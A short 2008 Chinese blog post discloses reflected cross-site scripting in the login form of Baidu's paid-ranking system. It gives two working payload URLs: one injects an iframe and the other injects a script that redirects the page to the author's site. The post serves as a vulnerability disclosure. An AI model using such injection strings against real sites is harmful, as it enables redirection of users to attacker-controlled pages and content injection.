首页 > 网络安全 > 百度搜索引擎竞价排名系统跨站

百度搜索引擎竞价排名系统跨站

2008年7月22日 发表评论 阅读评论

看到一篇《The Week of Baidu Bugs – Day 06: 百度竞价排名多处XSS漏洞》的文章,其中只提到几个部位,我打开百度看了一下,没有过滤特殊字符,造成跨站:

<br />http://www2.baidu.com/index.php?entered_login=%27%3E%3Ciframe%20src=http://www.woyigui.cn/index.php%20/%3E%3C%27&entered_password=ddd&entered_imagecode=rat8

直接跳转:

http://www2.baidu.com/index.php?entered_login=&#039;><SCRIPT%20language=javascript>top.location="http://www.woyigui.cn"</SCRIPT><&#039;&entered_password=ddd&entered_imagecode=rat8

效果图:

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:百度搜索引擎竞价排名系统跨站
本文地址:http://www.woyigui.cn/2008/07/22/Baidu-search-engine-PPC-system-inter-station/

分类: 网络安全 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*